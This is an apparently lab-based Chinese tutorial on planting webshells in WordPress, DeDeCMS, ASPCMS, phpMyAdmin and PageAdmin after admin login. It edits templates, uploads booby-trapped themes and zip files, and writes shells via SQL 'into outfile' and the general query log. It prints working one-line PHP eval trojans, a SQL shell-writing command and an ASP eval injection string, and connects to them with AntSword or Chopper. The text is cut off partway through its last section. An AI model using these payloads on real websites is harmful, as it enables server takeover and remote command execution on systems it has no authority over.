WordPress与主流CMS拿Webshell实战

一、wordpress

安装环境

首先我们在vulhub中启动我们wordpress的doaker容器

然后去访问我们的80端口

然后选择简体中文进行安装

然后就可以登录到我们的后台界面了

后台修改模板拿webshell

进入后台，我们修改一下404页面的代码，添加我们的一句话木马

然后保存，拼接路径去访问一下404.php页面看一下有没有解析我们的php语言

/wp-content/themes/twentyfifteen/404.php

 可以看到我们的木马被成功解析，接下来只需要蚁剑连接即可

上传主题拿webshell

首先我们先去主题网站上下载一套主题，要注意大小不要太大

然后将我们的一句话木马添加到这个压缩包中

然后将这个主题上传

可以看到上传成功

然后按照上个方法拼接路径即可

然后就可以使用蚁剑连接了

二、DeDeCMS

首先安装好我们的DeDeCMS，找一个压缩包解压到网站根目录即可

访问我们的网站,按照步骤教程安装即可

通过文件管理器拿webshell

登录后台管理界面后选择模块--文件管理器上传我们的木马文件

<?php phpinfo();@eval($_POST[cmd]);?>

可以看到上传成功

访问我们的一句话木马，可以看到上传成功

蚁剑连接即可

修改模板文件拿webshell

按照图示内容修改index.htm文件的内容

在文件内容开头加上我们的一句话木马

然后去修改，这个位置的内容

修改为，图示内容并保存

可以看到我们的木马已经被解析生效了，接下来只需要蚁剑连接即可

后台任意命令执行拿webshell

首先来到图片位置，添加一个广告

广告内容写上我们的一句话木马，点击确定保存

回到广告管理页面，点击代码，即可看到我们广告的路径拼接即可

查看页面源代码即可看到我们的一句话木马已经被解析了

使用菜刀进行连接即可

后台SQL命令执行拿webshell

找到图示位置

在这里我们可以利用into outfile来写入一句话木马

select '<?php phpinfo();@eval($_POST[cmd]);?>' into outfile 'E:/phpstudy_pro/WWW/1.php'

然后去访问我们上传的路径，报错的注意要修改一下my.ini中的配置文件

可以看到我们的一句话木马被解析了，然后蚁剑连接即可

三、ASPCMS

这次我们需要在iis中进行安装

找到我们iis的根目录，将我的ASPCMS压缩包解压到根目录即可

然后按照步骤进行安装，安装好后访问我们的后台，注意后台的路径，然后登录即可

后台修改配置文件拿webshell

按照图示找到位置

然后我们点击保存进行抓包

修改一下图中所示字段

修改为

1%25><%25Eval(Request (chr(65)))%25><%25

然后就可以根据以下地址进行菜刀连接

可以看到连接成功

四、PhPMyadmin

首先我们在小皮面板中安装一个PhPMyadmin

然后去访问，登录

通过日志拿webshell 

首先，点击变量然后搜索gen

然后将图中所示的两个值修改为，这样就可以将日志写入我门根目录下的1.php文件中

然后按照图示写一句话木马，点击执行

然后去访问我们的1.php，可以看到我们的一句话木马已经被解析了，接下来蚁剑访问即可

 导入导出拿webshell

在sql命令执行栏中输入，即看到数据库的地址，这样我们可以判断网站根目录的地址在哪

然后运用into outfile将我们的一句话木马写入网站的根目录中

然后去访问我们的2.php，可以看到一句话木马被解析，然后蚁剑连接即可

五、Pageadmin

仿照上面的步骤解压到根目录即可，注意这关需要使用的是sqlserver数据库，需要安装到iis中，选择存在的数据库名字

安装好登录即可

上传文件解压拿webshell

注意这里要上传的是压缩包，我们需要将我们的一句话木马添加到压缩包中

上传之后解压即可

然后去访问我们的1.asp

使用蚁剑连接即可

上传模块拿webshell

按照图示即可上传我们的木马文件的压缩包，但是这里需要授权